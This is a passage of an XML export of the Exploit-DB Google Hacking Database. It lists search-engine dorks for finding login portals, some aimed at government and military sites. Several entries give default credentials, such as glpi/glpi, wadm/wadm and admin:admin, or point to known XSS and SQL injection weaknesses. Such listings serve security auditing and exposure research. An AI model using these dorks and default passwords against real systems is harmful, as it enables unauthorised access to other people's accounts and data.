# Exploit Author: César Hernández Obispo</textualDescription>
<query>inurl:fgtauth?</query>
<querystring>https://www.google.com/search?q=inurl:fgtauth?</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>4393</id>
<link>https://www.exploit-db.com/ghdb/4393</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:forgot.do;jsessionid=</shortDescription>
<textualDescription>Forgot password portals
- Matt - twitter.com/novpn</textualDescription>
<query>inurl:forgot.do;jsessionid=</query>
<querystring>https://www.google.com/search?q=inurl:forgot.do;jsessionid=</querystring>
<edb></edb>
<date>2017-02-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6130</id>
<link>https://www.exploit-db.com/ghdb/6130</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:forgotpassword.asp</shortDescription>
<textualDescription>* Google Dork: *
inurl:forgotpassword.asp
*Various pages containing forgot password portals.*
*AUTHOR : ANJALI PRAKASH *
</textualDescription>
<query>inurl:forgotpassword.asp</query>
<querystring>https://www.google.com/search?q=inurl:forgotpassword.asp</querystring>
<edb></edb>
<date>2020-05-27</date>
<author>Anjali Prakash</author>
</entry>
<entry>
<id>6156</id>
<link>https://www.exploit-db.com/ghdb/6156</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:forgotpassword.do</shortDescription>
<textualDescription># Google Dork: inurl:forgotpassword.do
# Description:- Various pages containing forgot password portals
# Author: Janmejaya Swain
# Date: 28-May-2020
# Linkedin: https://www.linkedin.com/in/janmejayaswainofficial
</textualDescription>
<query>inurl:forgotpassword.do</query>
<querystring>https://www.google.com/search?q=inurl:forgotpassword.do</querystring>
<edb></edb>
<date>2020-05-29</date>
<author>Janmejaya Swain</author>
</entry>
<entry>
<id>6143</id>
<link>https://www.exploit-db.com/ghdb/6143</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:forgotpassword.htm</shortDescription>
<textualDescription>*# Google Dork:*
* inurl:forgotpassword.htmDescription:- Various pages containing
forgot password portals*
*# Author: Janmejaya Swain
# Date: 28-May-2020
# Linkedin:
https://www.linkedin.com/in/janmejayaswainofficial
</textualDescription>
<query>inurl:forgotpassword.htm</query>
<querystring>https://www.google.com/search?q=inurl:forgotpassword.htm</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Janmejaya Swain</author>
</entry>
<entry>
<id>4569</id>
<link>https://www.exploit-db.com/ghdb/4569</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:front/central.php</shortDescription>
<textualDescription>GLPI login screen. Default login:
* glpi/glpi (super-admin)
* tech/tech
* postonly/postonly (only for helpdesk)
* normal/normal
--
@verovan</textualDescription>
<query>inurl:front/central.php</query>
<querystring>https://www.google.com/search?q=inurl:front/central.php</querystring>
<edb></edb>
<date>2017-08-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>8077</id>
<link>https://www.exploit-db.com/ghdb/8077</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:GeminiVAIdServer</shortDescription>
<textualDescription># Google Dork: inurl:GeminiVAIdServer
# Pages Containing Login Portals
# Date:22/02/2023
# Exploit Author: Prayag Mathukiya</textualDescription>
<query>inurl:GeminiVAIdServer</query>
<querystring>https://www.google.com/search?q=inurl:GeminiVAIdServer</querystring>
<edb></edb>
<date>2023-02-22</date>
<author>Prayag Mathukiya</author>
</entry>
<entry>
<id>8078</id>
<link>https://www.exploit-db.com/ghdb/8078</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:GeminiVAIdServer</shortDescription>
<textualDescription># Google Dork: inurl:GeminiVAIdServer
# Pages Containing Login Portals
# Date:22/02/2023
# Exploit Author: Prayag Mathukiya</textualDescription>
<query>inurl:GeminiVAIdServer</query>
<querystring>https://www.google.com/search?q=inurl:GeminiVAIdServer</querystring>
<edb></edb>
<date>2023-02-22</date>
<author>Prayag Mathukiya</author>
</entry>
<entry>
<id>6915</id>
<link>https://www.exploit-db.com/ghdb/6915</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:glpi intitle:&quot;GLPI&quot; site:.br</shortDescription>
<textualDescription># Google Dork: inurl:glpi intitle:&quot;GLPI&quot; site:.br
# Dork Author: J3di M0nk</textualDescription>
<query>inurl:glpi intitle:&quot;GLPI&quot; site:.br</query>
<querystring>https://www.google.com/search?q=inurl:glpi intitle:&quot;GLPI&quot; site:.br</querystring>
<edb></edb>
<date>2021-05-03</date>
<author>J3di M0nk</author>
</entry>
<entry>
<id>963</id>
<link>https://www.exploit-db.com/ghdb/963</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:gnatsweb.pl</shortDescription>
<textualDescription>GNU GNATS is a set of tools for tracking bugs reported by users to a central site. It allows problem report management and communication with users via various means. GNATS stores all the information about problem reports in its databases and provides tools for querying, editing, and maintenance of the databases.</textualDescription>
<query>inurl:gnatsweb.pl</query>
<querystring>https://www.google.com/search?q=inurl%3Agnatsweb.pl</querystring>
<edb></edb>
<date>2005-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>7647</id>
<link>https://www.exploit-db.com/ghdb/7647</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:gov.in</shortDescription>
<textualDescription># Google Dork: inurl:gov.in
# Pages Containing Login Portals
# Date: 08/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>inurl:gov.in</query>
<querystring>https://www.google.com/search?q=inurl:gov.in</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>7693</id>
<link>https://www.exploit-db.com/ghdb/7693</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:gov.in &amp; (intitle:login | intitle:signin)</shortDescription>
<textualDescription># Google Dork: inurl:gov.in &amp; (intitle:login | intitle:signin)
# Pages Containing Login Portals
# Date: 08/11/2021
# Exploit Author: Sabyasachi Paul</textualDescription>
<query>inurl:gov.in &amp; (intitle:login | intitle:signin)</query>
<querystring>https://www.google.com/search?q=inurl:gov.in &amp; (intitle:login | intitle:signin)</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Sabyasachi Paul</author>
</entry>
<entry>
<id>7694</id>
<link>https://www.exploit-db.com/ghdb/7694</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:gov.in &amp; inurl:wp-admin</shortDescription>
<textualDescription># Google Dork: inurl:gov.in &amp; inurl:wp-admin
# Pages Containing Login Portals
# Date: 08/11/2021
# Exploit Author: Sabyasachi Paul</textualDescription>
<query>inurl:gov.in &amp; inurl:wp-admin</query>
<querystring>https://www.google.com/search?q=inurl:gov.in &amp; inurl:wp-admin</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Sabyasachi Paul</author>
</entry>
<entry>
<id>7721</id>
<link>https://www.exploit-db.com/ghdb/7721</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:gov.uk &amp; inurl:wp-admin</shortDescription>
<textualDescription># Google Dork: inurl:gov.uk &amp; inurl:wp-admin
# Pages Containing Login Portals
# Date:9/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>inurl:gov.uk &amp; inurl:wp-admin</query>
<querystring>https://www.google.com/search?q=inurl:gov.uk &amp; inurl:wp-admin</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>8113</id>
<link>https://www.exploit-db.com/ghdb/8113</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:guest/auth_login.php</shortDescription>
<textualDescription># Google Dork: inurl:guest/auth_login.php
# Pages Containing Login Portals
# Date:16/03/2023
# Exploit Author: Javier Bernardo</textualDescription>
<query>inurl:guest/auth_login.php</query>
<querystring>https://www.google.com/search?q=inurl:guest/auth_login.php</querystring>
<edb></edb>
<date>2023-03-16</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>7990</id>
<link>https://www.exploit-db.com/ghdb/7990</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:http ext:php inurl:login</shortDescription>
<textualDescription># Google Dork: inurl:http ext:php inurl:login
# Pages Containing Login Portals
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>inurl:http ext:php inurl:login</query>
<querystring>https://www.google.com/search?q=inurl:http ext:php inurl:login</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>4609</id>
<link>https://www.exploit-db.com/ghdb/4609</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:https://owa</shortDescription>
<textualDescription>*Google dork description: *Sites running Outlook Web Application (OWA) and
in extension run e-mail via Microsoft Exchange
*Google Search: *inurl:https://owa
*Submitted by:* Alfie_the-infosec_
</textualDescription>
<query>inurl:https://owa</query>
<querystring>https://www.google.com/search?q=inurl:https://owa</querystring>
<edb></edb>
<date>2017-11-03</date>
<author>Alfie</author>
</entry>
<entry>
<id>4260</id>
<link>https://www.exploit-db.com/ghdb/4260</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:https://pma.</shortDescription>
<textualDescription>Google dork Description: inurl:https://pma.
Google search: inurl:https://pma.
Date: 2016-11-04
Author: khajj16
Summary: phpmyadmin login portals intended to handle the administration of
MySQL or MariaDB with the use of a web browser.</textualDescription>
<query>inurl:https://pma.</query>
<querystring>https://www.google.com/search?q=inurl:https://pma.</querystring>
<edb></edb>
<date>2016-04-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>6734</id>
<link>https://www.exploit-db.com/ghdb/6734</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:idp/Authn/UserPassword</shortDescription>
<textualDescription># Google Dork: inurl:idp/Authn/UserPassword
# Date: 12/17/2020
# Exploit Author: Javier Bernardo
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:idp/Authn/UserPassword</query>
<querystring>https://www.google.com/search?q=inurl:idp/Authn/UserPassword</querystring>
<edb></edb>
<date>2021-01-05</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>6724</id>
<link>https://www.exploit-db.com/ghdb/6724</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:idp/prp.wsf</shortDescription>
<textualDescription># Google Dork: inurl:idp/prp.wsf
# Date: 12/10/2020
# Pages Containing Login Portals
# Exploit Author: Javier Bernardo
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:idp/prp.wsf</query>
<querystring>https://www.google.com/search?q=inurl:idp/prp.wsf</querystring>
<edb></edb>
<date>2020-12-11</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>6572</id>
<link>https://www.exploit-db.com/ghdb/6572</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:idp/SSO.saml2</shortDescription>
<textualDescription># Google Dork: inurl:idp/SSO.saml2
# Date: 9/25/2020
# Exploit Author: Javier Bernardo
# Homepage: https://www.hack.com.ar
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:idp/SSO.saml2</query>
<querystring>https://www.google.com/search?q=inurl:idp/SSO.saml2</querystring>
<edb></edb>
<date>2020-09-25</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>1267</id>
<link>https://www.exploit-db.com/ghdb/1267</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:ids5web</shortDescription>
<textualDescription>EasyAccess Web is a application to view radiological images online.Like in hospitals or universities.Problem is the default administrative login: wadm/wadmBe able to watch sensitive data and images.very bad...</textualDescription>
<query>inurl:ids5web</query>
<querystring>https://www.google.com/search?q=inurl:ids5web</querystring>
<edb></edb>
<date>2006-02-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4086</id>
<link>https://www.exploit-db.com/ghdb/4086</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:imapuser Mail :: Welcome to Horde imp login.php password</shortDescription>
<textualDescription>Mail :: Welcome to Horde
Gives usernames on Horde email websites and other email websites as well.
-Xploit
</textualDescription>
<query>inurl:imapuser Mail :: Welcome to Horde imp login.php password</query>
<querystring>https://www.google.com/search?q=inurl:imapuser Mail :: Welcome to Horde imp login.php password</querystring>
<edb></edb>
<date>2015-10-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>4565</id>
<link>https://www.exploit-db.com/ghdb/4565</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:index of= %2F /admin login %2F intitle:&quot;Administration Login -</shortDescription>
<textualDescription>Admin Logins for different Web Hosting Companies.
Other Dorks.
inurl:index of= %2F /Admin Login %2F
inurl:&quot;Admin/Index.aspx?&quot;
inurl:&quot;Admin/Index.aspx?A=LogOut&quot;
-Xploit </textualDescription>
<query>inurl:index of= %2F /admin login %2F intitle:&quot;Administration Login -</query>
<querystring>https://www.google.com/search?q=inurl:index of= %2F /admin login %2F intitle:&quot;Administration Login -</querystring>
<edb></edb>
<date>2017-07-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>6422</id>
<link>https://www.exploit-db.com/ghdb/6422</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:index.php &quot;Powered by PHP Server Monitor v3.1.1&quot;</shortDescription>
<textualDescription># Google Dork: inurl:index.php &quot;Powered by PHP Server Monitor v3.1.1&quot;
# Pages containing login portals.
# Date: 20/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:index.php &quot;Powered by PHP Server Monitor v3.1.1&quot;</query>
<querystring>https://www.google.com/search?q=inurl:index.php &quot;Powered by PHP Server Monitor v3.1.1&quot;</querystring>
<edb></edb>
<date>2020-07-21</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4257</id>
<link>https://www.exploit-db.com/ghdb/4257</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:index.php?app=main intitle:sms</shortDescription>
<textualDescription>login portals to playsms webapp
default password admin:admin</textualDescription>
<query>inurl:index.php?app=main intitle:sms</query>
<querystring>https://www.google.com/search?q=inurl:index.php?app=main intitle:sms</querystring>
<edb></edb>
<date>2016-04-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6785</id>
<link>https://www.exploit-db.com/ghdb/6785</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:index.php?s=/Admin/Public/login.html</shortDescription>
<textualDescription>Dork: inurl:index.php?s=/Admin/Public/login.html</textualDescription>
<query>inurl:index.php?s=/Admin/Public/login.html</query>
<querystring>https://www.google.com/search?q=inurl:index.php?s=/Admin/Public/login.html</querystring>
<edb></edb>
<date>2021-02-08</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5069</id>
<link>https://www.exploit-db.com/ghdb/5069</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:infoviewapp</shortDescription>
<textualDescription>AUTHOR: FlyingFrog
Twitter: @ItsKarl0z
++ SAP InfoView Business Objects ++
inurl:infoviewapp
- Potential access to sensitive information
- Login portals
- Server entry points
- Server
- Potential to manipulate business objects
- 2 Cross-Site Scripting Vulnerabillites available:
- https://www.exploit-db.com/exploits/36936
- https://www.exploit-db.com/exploits/36935
- 3.680 results at the time of writing
DISCLAIMER:
(The vulnerabilities are suggestions, none of them have been tested by me,
always request permission before testing anything on someone else system)
Some of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing
</textualDescription>
<query>inurl:infoviewapp</query>
<querystring>https://www.google.com/search?q=inurl:infoviewapp</querystring>
<edb></edb>
<date>2019-01-09</date>
<author>FlyingFrog</author>
</entry>
<entry>
<id>4263</id>
<link>https://www.exploit-db.com/ghdb/4263</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:inmotionhosting.com:2096/</shortDescription>
<textualDescription># Title: Webmail login pages
# Google Dork: inurl:inmotionhosting.com:2096/
# Date: 04/14/2016
# Author: Stephanie Jensen (https://twitter.com/Steph_J_)
Summary
Searching with omitted results gives you webmail login pages. Some
search results even display login credentials in search result titles.
</textualDescription>
<query>inurl:inmotionhosting.com:2096/</query>
<querystring>https://www.google.com/search?q=inurl:inmotionhosting.com:2096/</querystring>
<edb></edb>
<date>2016-04-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4180</id>
<link>https://www.exploit-db.com/ghdb/4180</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:intranet -intext:intranet</shortDescription>
<textualDescription>This Dork show millions of access to intranet pages.
Dork by Rootkit Pentester.
Regards.</textualDescription>
<query>inurl:intranet -intext:intranet</query>
<querystring>https://www.google.com/search?q=inurl:intranet -intext:intranet</querystring>
<edb></edb>
<date>2016-01-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4198</id>
<link>https://www.exploit-db.com/ghdb/4198</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:intranet site:www.*.gov</shortDescription>
<textualDescription># Exploit Title: inurl:intranet site:www.*.gov
# Google Dork: inurl:intranet site:www.*.gov
# Description : Dork to find login portal access to intranet systems
on government websites.
# Date: 09/02/2016
# Exploit Author: XDarkCoder</textualDescription>
<query>inurl:intranet site:www.*.gov</query>
<querystring>https://www.google.com/search?q=inurl:intranet site:www.*.gov</querystring>
<edb></edb>
<date>2016-02-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4727</id>
<link>https://www.exploit-db.com/ghdb/4727</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:intranet/login login</shortDescription>
<textualDescription>Login portals to intranets
Bruno Schmid
</textualDescription>
<query>inurl:intranet/login login</query>
<querystring>https://www.google.com/search?q=inurl:intranet/login login</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>641</id>
<link>https://www.exploit-db.com/ghdb/641</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:irc filetype:cgi cgi:irc</shortDescription>
<textualDescription>CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not let allow access to anything else.</textualDescription>
<query>inurl:irc filetype:cgi cgi:irc</query>
<querystring>https://www.google.com/search?num=100&amp;q=inurl%3Airc+filetype%3Acgi+cgi%3Airc</querystring>
<edb></edb>
<date>2004-11-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>6764</id>
<link>https://www.exploit-db.com/ghdb/6764</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:jasperserver-pro/login.html</shortDescription>
<textualDescription>inurl:jasperserver-pro/login.html
Author : Ali Hassam
</textualDescription>
<query>inurl:jasperserver-pro/login.html</query>
<querystring>https://www.google.com/search?q=inurl:jasperserver-pro/login.html</querystring>
<edb></edb>
<date>2021-01-26</date>
<author>Ali Hassam</author>
</entry>
<entry>
<id>223</id>
<link>https://www.exploit-db.com/ghdb/223</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login filetype:swf swf</shortDescription>
<textualDescription>This search reveals sites which may be using Shockwave (Flash) as a login mechanism for a site. The usernames and passwords for this type of login mechanism are often stored in plaintext inside the source of the .swl file.</textualDescription>
<query>inurl:login filetype:swf swf</query>
<querystring>https://www.google.com/search?q=inurl%3Alogin+filetype%3Aswf+swf</querystring>
<edb></edb>
<date>2004-05-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>7230</id>
<link>https://www.exploit-db.com/ghdb/7230</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login intext:&quot; fiesta login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:login intext:&quot; fiesta login&quot;
# Pages Containing Login Portals
# Date: 15/09/2021
# Exploit Author: Saiju Pillai</textualDescription>
<query>inurl:login intext:&quot; fiesta login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:login intext:&quot; fiesta login&quot;</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>Saiju Pillai</author>
</entry>
<entry>
<id>7181</id>
<link>https://www.exploit-db.com/ghdb/7181</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login intext:&quot;Powered by Plone &amp; Python&quot; -plone.org</shortDescription>
<textualDescription># Google Dork: inurl:login intext:&quot;Powered by Plone &amp; Python&quot; -plone.org
# Pages Containing Login Portals
# Date: 06/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>inurl:login intext:&quot;Powered by Plone &amp; Python&quot; -plone.org</query>
<querystring>https://www.google.com/search?q=inurl:login intext:&quot;Powered by Plone &amp; Python&quot; -plone.org</querystring>
<edb></edb>
<date>2021-09-10</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>4975</id>
<link>https://www.exploit-db.com/ghdb/4975</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login intext:&quot;reset your password&quot;</shortDescription>
<textualDescription>Information on how login portals reset their users/customers passwords and
so on.
Bruno Schmid
https://ch.linkedin.com/in/schm
</textualDescription>
<query>inurl:login intext:&quot;reset your password&quot;</query>
<querystring>https://www.google.com/search?q=inurl:login intext:&quot;reset your password&quot;</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>172</id>
<link>https://www.exploit-db.com/ghdb/172</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.asp</shortDescription>
<textualDescription>This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention.</textualDescription>
<query>inurl:login.asp</query>
<querystring>https://www.google.com/search?q=inurl%3Alogin%2Easp</querystring>
<edb></edb>
<date>2004-04-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>5204</id>
<link>https://www.exploit-db.com/ghdb/5204</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.aspx filetype:aspx intext:&quot;TMW Systems&quot;</shortDescription>
<textualDescription>Transportation Analytics Login Portals.
Decoy
</textualDescription>
<query>inurl:login.aspx filetype:aspx intext:&quot;TMW Systems&quot;</query>
<querystring>https://www.google.com/search?q=inurl:login.aspx filetype:aspx intext:&quot;TMW Systems&quot;</querystring>
<edb></edb>
<date>2019-05-07</date>
<author>Dec0y</author>
</entry>
<entry>
<id>7121</id>
<link>https://www.exploit-db.com/ghdb/7121</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:Login.aspx intitle:&quot;:::Login:::&quot; &quot;RM&quot;</shortDescription>
<textualDescription># Google Dork: inurl:Login.aspx intitle:&quot;:::Login:::&quot; &quot;RM&quot;
# Pages Containing Login Portals
# Date: 05/08/2021
# Exploit Author: Neha Singh
</textualDescription>
<query>inurl:Login.aspx intitle:&quot;:::Login:::&quot; &quot;RM&quot;</query>
<querystring>https://www.google.com/search?q=inurl:Login.aspx intitle:&quot;:::Login:::&quot; &quot;RM&quot;</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>166</id>
<link>https://www.exploit-db.com/ghdb/166</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.cfm</shortDescription>
<textualDescription>This is the default login page for ColdFusion. Although many of these are secured, this is an indicator of a default installation, and may be inherantly insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server.</textualDescription>
<query>inurl:login.cfm</query>
<querystring>https://www.google.com/search?q=inurl%3Alogin%2Ecfm</querystring>
<edb></edb>
<date>2004-04-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5326</id>
<link>https://www.exploit-db.com/ghdb/5326</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.cgi</shortDescription>
<textualDescription>pages containing login portal
inurl:login.cgi
Reza Abasi(Turku)
</textualDescription>
<query>inurl:login.cgi</query>
<querystring>https://www.google.com/search?q=inurl:login.cgi</querystring>
<edb></edb>
<date>2019-08-06</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4197</id>
<link>https://www.exploit-db.com/ghdb/4197</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.do intext:government</shortDescription>
<textualDescription># Exploit Title: Dork to find Government and Military website access
portals.
# Google Dork: inurl:login.do intext:government
# Description : Finds out login access portals to Military and Government
Systems. Enjoy.
# Date: 09/02/2016
# Exploit Author: XDarkCoder</textualDescription>
<query>inurl:login.do intext:government</query>
<querystring>https://www.google.com/search?q=inurl:login.do intext:government</querystring>
<edb></edb>
<date>2016-02-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4979</id>
<link>https://www.exploit-db.com/ghdb/4979</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.do? | shoplogin.do | adminlogin</shortDescription>
<textualDescription>More login portals...
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:login.do? | shoplogin.do | adminlogin</query>
<querystring>https://www.google.com/search?q=inurl:login.do? | shoplogin.do | adminlogin</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6171</id>
<link>https://www.exploit-db.com/ghdb/6171</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.do?method=login</shortDescription>
<textualDescription>Dork:
inurl:login.do?method=login
Description: This google dork lists out the various pages containing login
portals.
Author: Abhinav Porwal
Company: Cyber Defender
LinkedIn: https://www.linkedin.com/in/abhinavporwal6/
</textualDescription>
<query>inurl:login.do?method=login</query>
<querystring>https://www.google.com/search?q=inurl:login.do?method=login</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>5117</id>
<link>https://www.exploit-db.com/ghdb/5117</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.htm &quot;access&quot; database</shortDescription>
<textualDescription>Several database logins
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:login.htm &quot;access&quot; database</query>
<querystring>https://www.google.com/search?q=inurl:login.htm &quot;access&quot; database</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5116</id>
<link>https://www.exploit-db.com/ghdb/5116</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.htm &quot;xpress&quot; password</shortDescription>
<textualDescription>Xpress login portals, powered by Ilantus
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:login.htm &quot;xpress&quot; password</query>
<querystring>https://www.google.com/search?q=inurl:login.htm &quot;xpress&quot; password</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6122</id>
<link>https://www.exploit-db.com/ghdb/6122</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.jsf</shortDescription>
<textualDescription>Dork:- inurl:login.jsf
Description:-
This Dork id used to find the Login portal of web page developed under
java based technology login web page.
Author:- Manish Kumar
</textualDescription>
<query>inurl:login.jsf</query>
<querystring>https://www.google.com/search?q=inurl:login.jsf</querystring>
<edb></edb>
<date>2020-05-25</date>
<author>Manish Kumar</author>
</entry>
<entry>
<id>4884</id>
<link>https://www.exploit-db.com/ghdb/4884</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.jsp intitle:&quot;admin&quot;</shortDescription>
<textualDescription>Dork : inurl:login.jsp intitle:&quot;admin&quot;
Description : This Dork id Used to find the Admin Login Portal of a Web Page
Author: Lino Thomas
</textualDescription>
<query>inurl:login.jsp intitle:&quot;admin&quot;</query>
<querystring>https://www.google.com/search?q=inurl:login.jsp intitle:&quot;admin&quot;</querystring>
<edb></edb>
<date>2018-07-05</date>
<author>Lino Thomas</author>
</entry>
<entry>
<id>5657</id>
<link>https://www.exploit-db.com/ghdb/5657</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.jsp intitle:login</shortDescription>
<textualDescription>*Google Dork:* inurl:login.jsp intitle:login
*Description:* Pages Containing Login Portals
*Author:* shivaGprasadh
</textualDescription>
<query>inurl:login.jsp intitle:login</query>
<querystring>https://www.google.com/search?q=inurl:login.jsp intitle:login</querystring>
<edb></edb>
<date>2019-11-22</date>
<author>shivaGprasadh</author>
</entry>
<entry>
<id>4842</id>
<link>https://www.exploit-db.com/ghdb/4842</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.jsp?permissionViolation</shortDescription>
<textualDescription>JIRA login portals
Also try inurl:user_role=ADMIN
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:login.jsp?permissionViolation</query>
<querystring>https://www.google.com/search?q=inurl:login.jsp?permissionViolation</querystring>
<edb></edb>
<date>2018-06-05</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7651</id>
<link>https://www.exploit-db.com/ghdb/7651</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.net</shortDescription>
<textualDescription># Google Dork:inurl:login.net
# Pages Containing Login Portals
# Date: 0811/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>inurl:login.net</query>
<querystring>https://www.google.com/search?q=inurl:login.net</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>608</id>
<link>https://www.exploit-db.com/ghdb/608</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.php &quot;SquirrelMail version&quot;</shortDescription>
<textualDescription>squirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation.</textualDescription>
<query>inurl:login.php &quot;SquirrelMail version&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Alogin.php+%22SquirrelMail+version%22</querystring>
<edb></edb>
<date>2004-10-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>7755</id>
